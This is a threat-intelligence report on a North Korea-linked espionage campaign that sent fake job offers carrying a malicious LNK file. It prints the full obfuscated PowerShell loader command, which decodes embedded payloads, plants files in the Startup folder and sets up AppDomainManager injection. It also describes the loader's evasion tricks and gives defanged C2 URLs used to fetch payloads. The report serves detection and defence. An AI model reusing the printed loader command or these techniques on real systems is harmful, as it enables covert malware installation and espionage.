Squid Werewolf cyber spies masquerade as recruiters
Espionage activity clusters may pose as recruiters to distribute phishing emails, targeting key employees in organizations of interest. In December 2024, the BI.ZONE Threat Intelligence team uncovered a peculiar phishing campaign aimed at luring victims with fake job opportunities at an industrial organization. A detailed analysis revealed that the attack had been carried out by Squid Werewolf (APT37, Ricochet Chollima, ScarCruft, Reaper Group).
- Targeted phishing emails with relevant subject lines enable attackers to promptly access data within the systems used by key personnel.
- Threat actors are increasingly shifting away from Microsoft Word documents and Microsoft Excel spreadsheets, instead focusing on archives containing executables, scripts, or shortcuts.
- Espionage clusters are opting for more sophisticated methods and tools. Therefore, using advanced threat detection solutions such as EDR is recommended to mitigate the risks.
The attack would begin with a phishing email, which the adversaries disguised as a job offer from a United Industrial Complex HR representative.
Phishing email sent by the threat actor
The attachment comprised a password‑protected file Предложение о работе.zip, with the password provided in the email. The ZIP archive included an LNK file Предложение о работе.pdf.lnk which, once opened, executed the following command:
powershell.exe -nop -c $t=$env:appdata+'\Microsoft\Windows\Start Menu\Programs\Startup';if(Get-ChildItem $env:temp -recurse 'Предложение о работе.pdf.lnk'){$k=New-Object IO.FileStream ($env:temp+'\'+((Get-ChildItem $env:temp -recurse 'Предложение о работе.pdf.lnk').Directory).Name+'\'+'Предложение о работе.pdf.lnk'),'Open','Read','ReadWrite'}else{$k=New-Object IO.FileStream 'Предложение о работе.pdf.lnk','Open','Read','ReadWrite'};$b=New-Object byte[](692604);$k.Seek(3001,[IO.SeekOrigin]::Begin);$k.Read($b,0,692604);$a=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64CharArray($b,0,$b.Length)) -split ':';copy 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe' ($t+'\d.exe');[IO.File]::<# mm #>WriteAllBytes($t+'\d.exe.config',[Convert]::FromBase64""String($a[0]));[IO.File]::<# mm #>WriteAllBytes($t+'\DomainManager.dll',[Convert]::FromBase64""String($a[1]));[IO.File]::<# mm #>WriteAllBytes($env:temp+'\mngs Attachement.pdf',[Convert]::FromBase64""String($a[2]));explorer ($env:temp+'\mngs Attachement.pdf');start ($t+'\d.exe')
This command triggered the following sequence:
- Open the file
Предложение о работе.pdf.lnkto read the Base64‑encoded data from the offset and decode it. The resulting data is then split by the : character and decoded again using the Base algorithm. - Copy the file
%WINDOWS%\Microsoft.NET\Framework\v0.30319\dfsvc.exeto%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\d.exeto gain persistence in the system. - Save the decoded data to the following files:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\d.exe.config%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\DomainManager.dll%TEMP%\mngs Attachement.pdf
- Open the phishing document
mngs Attachement.pdf. - Run the
d.exeexecutable.
Base64-encoded payload in Предложение о работе.pdf.lnk
Phishing document mngs Attachement.pdf
The d.exe (dfsvc.exe)DomainManager.dll.
The d.exe file is a .NET application. When a user runs a .NET application, the Common Language Runtime (CLR) automatically loads and analyzes its configuration file (in this case, d.exe.config).
The d.exe.config file contents:
The <runtime> section of the configuration file specifies the .NET CLR runtime settings used to load a custom AppDomainManager
<appDomainManagerType value="DomainManager.InjectedDomainManager" />indicates the class to be used as AppDomainManager.InjectedDomainManagermeans that the classInjectedDomainManagerwill be loaded by the CLR from the namespace DomainManager.<appDomainManagerAssembly value="DomainManager" />indicates the assembly (DLL) from which AppDomainManager is loaded. In our case, this is a DLL file located in the same directory as thed.exeexecutable.
DomainManager.dll is a C#-based loader that is obfuscated, likely using Obfuscar.
The loader strings are stored in a double XOR-encrypted byte array, with a character index in the array and the 0xAA key.
The entry point is in the method InitializeNewDomain of the class InjectedDomainManager.
A code example is available below
The loader can perform the following operations:
-
Check internet connectivity by calling
https://www.timeapi[.]io/api/time/current/zone?timeZone=Europe%2FAmsterdam. If the server response includes the“seconds”string, access is confirmed; otherwise, the Internet is unavailable.
-
Check a program’s runtime to impede sandbox execution. To do this, the loader captures the current timestamp, sleeps for 10 minutes, then updates the timestamp and calculates the time difference. If it exceeds nine minutes, the loader sends a GET request to
hxxps://hwsrv-1253398.hostwindsdns[.]com/307c77ab-f41f-4dd4-a478-2a71b9625f64/c/discountcode.phpand then terminates.
- If all checks are successfully passed, the loader disables autoruns from the startup folder by setting the following registry key parameters:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder]:dll = 0x3exe.config = 0x3
- Check for the presence of
%LOCALAPPDATA%\DomainManager.conf. If this file exists, the loader reads the malicious payload encrypted using AES128 CBC, decrypts it, and executes it in memory. If%LOCALAPPDATA%\DomainManager.confdoes not exist, the loader sends a GET request tohxxps://hwsrv-1253398.hostwindsdns[.]com/307c77ab-f41f-4dd4-a478-2a71b9625f64/c/shoppingcart.php. The server response is decrypted using AES128 CBC. It encompasses a malicious payload, which the loader runs in memory. The server payload is saved to the file%LOCALAPPDATA%\DomainManager.confencrypted with AES128 CBC. The payload was unavailable at the time of the research.
The attack detected by BI.ZONE Threat Intelligence closely resembles one described by the Securonix team, who attribute it to the APT37 cluster (dubbed Squid Werewolf by BI.ZONE).
The adversaries employed a similar C#-based library in the past. At the time, however, the payload was decrypted using a Caesar (shift) cipher and contained obfuscated JavaScript code. The payload comprised another loader that sent a victim’s computer name to the server, then loaded and executed a PowerShell script, incorporating the VeilShell remote access trojan.
20dd93441c5e78b7adc7764c92719bed70ddb0676f707df7ea9f37d7969f477649a2ed08930ed20cbf859ca2fe3113e64f7a305c7a03cbda284fcceb781d053b0601426a6da40ec9b47bab54e4ec149ba69ee58f787eea0e32d1001cab1abd04hwsrv-1253398.hostwindsdns[.]com
| Tactic | Technique | Procedure |
|---|---|---|
| Initial Access | Phishing: Spearphishing Attachment |
Squid Werewolf uses phishing email attachments to distribute malware |
| Execution | Command and Scripting Interpreter: PowerShell |
Squid Werewolf uses a malicious LNK file to execute the PowerShell command |
User Execution: Malicious File |
The victim must execute the malicious LNK file to initiate the system compromise |
|
| Persistence | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Squid Werewolf employs the malicious LNK file to create files |
| Defense Evasion | Deobfuscate/Decode Files or Information |
Squid Werewolf uses a PowerShell script to decode a Base64-encoded payload from the malicious LNK, comprising three files: Squid Werewolf uses a .NET loader to decrypt the payload file Squid Werewolf uses a .NET loader to decrypt double XOR-encrypted strings |
Hijack Execution Flow: AppDomainManager |
Squid Werewolf employs AppDomainManager injection to run the .NET loader |
|
Masquerading: Rename System Utilities |
Squid Werewolf uses the malicious LNK file to copy and rename the .NET‑associated process |
|
Masquerading: Double File Extension |
Squid Werewolf uses the double extension |
|
Modify Registry |
Squid Werewolf employs the .NET loader to modify the parameters of the registry key |
|
Obfuscated Files or Information |
Squid Werewolf uses Obfuscar to obfuscate the .NET loader. Squid Werewolf uses double XOR to encrypt strings in the .NET loader |
|
Obfuscated Files or Information: Embedded Payloads |
Squid Werewolf employs the malicious LNK file with a Base64-encoded payload comprising three files: |
|
Obfuscated Files or Information: Command Obfuscation |
Squid Werewolf uses an obfuscated PowerShell command in the malicious LNK file |
|
Obfuscated Files or Information: Encrypted/Encoded File |
Squid Werewolf employs the payload file |
|
Virtualization/Sandbox Evasion: Time Based Evasion |
Squid Werewolf leverages a 10-minute delay in the .NET payload to check a program’s runtime |
|
| Discovery | System Network Configuration Discovery: Internet Connection Discovery |
Squid Werewolf uses the |
| Command and Control | Application Layer Protocol: Web Protocols |
Squid Werewolf uses HTTPS to load the encrypted payload file |
Ingress Tool Transfer |
Squid Werewolf employs a .NET loader to download malicious payload from the server |
The described malicious activity can be detected using the following rules from BI.ZONE EDR:
win_suspicious_powershell_base64win_renamed_dfsvc_processwin_th_create_file_in_startup_folder_via_command_interpreter
Like many other clusters, Squid Werewolf employs phishing emails to infiltrate a victim’s infrastructure. These risks can be mitigated with email proteсtion solutions like BI.ZONE CESP. The service features a high-performance engine of our own design and incorporates various methods of email traffic analysis.
Building an effective cybersecurity strategy requires an understanding of adversaries’ methods and tools while staying alert to the latest threats. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence portal. The solution provides information about the current attacks, threat actors, their methods and tools, as well as data from underground resources. This intelligence helps to ensure the precision of your security solutions, which in turn accelerates incident response and protects your company from the most critical threats.